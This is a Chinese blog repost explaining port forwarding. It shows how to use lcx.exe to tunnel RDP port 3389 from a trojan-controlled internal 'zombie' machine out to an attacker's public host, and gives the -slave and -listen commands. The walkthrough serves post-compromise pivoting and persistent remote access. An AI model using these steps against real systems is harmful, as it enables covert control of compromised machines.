windows端口转发工具(LCX)

端口转发(Port forwarding),有时被叫做隧道,是安全壳(SSH) 为网络安全通信使用的一种方法。端口转发是转发一个网络端口从一个网络节点到另一个网络节点的行为,其使一个外部用户从外部经过一个被激活的NAT路由器到达一个在私有内部IP地址(局域网内部)上的一个端口。

这里我就用工具是Lcx,Lcx.exe是一个端口转发工具,相当于把肉鸡A上的3389端口转发到具有外网IP地址的B机上,这样连接B机的3389端口就相当于链接A机的3389端口。Lcx程序多用于被控制计算机(肉鸡)处于内网的情况,被控制机可能中了木马程序,虽然能够进行控制,但还是没有使用远程终端登陆到本机进行管理方便,因此在很多情况下,都会想方设法在被控制计算机上开启3389端口,然后通过lcx等程序进行端口转发,进而在本地连接到被控制计算机的远程终端并进行管理和使用。

 

 

 

先开启 Windows xp 查看内网IP信息

 

 

在目标机器上执行lcx.exe -slave 公网ip 端口 内网ip 端口

例如:lcx.exe –slave 154.223.*.* 51 192.168.*.* 3389 将内网的3389端口转发到公网的51端口

 

然后在公网的机器上:Lcx.exe –listen 监听51端口,转发到公网机器的3389端口

 

例如:Lcx.exe –listen 51 3389

这个时候已经将内网的3389转发到了公网机器的3389端口,我们在本地机器上远程公网IP 3389 ,就连接上了内网机器的3389,此时已经成功登陆进来,我们查看IP,可以看到是目标机器。

文章来源:黑白之道

转载于:https://www.cnblogs.com/Eleven-Liu/p/11228735.html

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值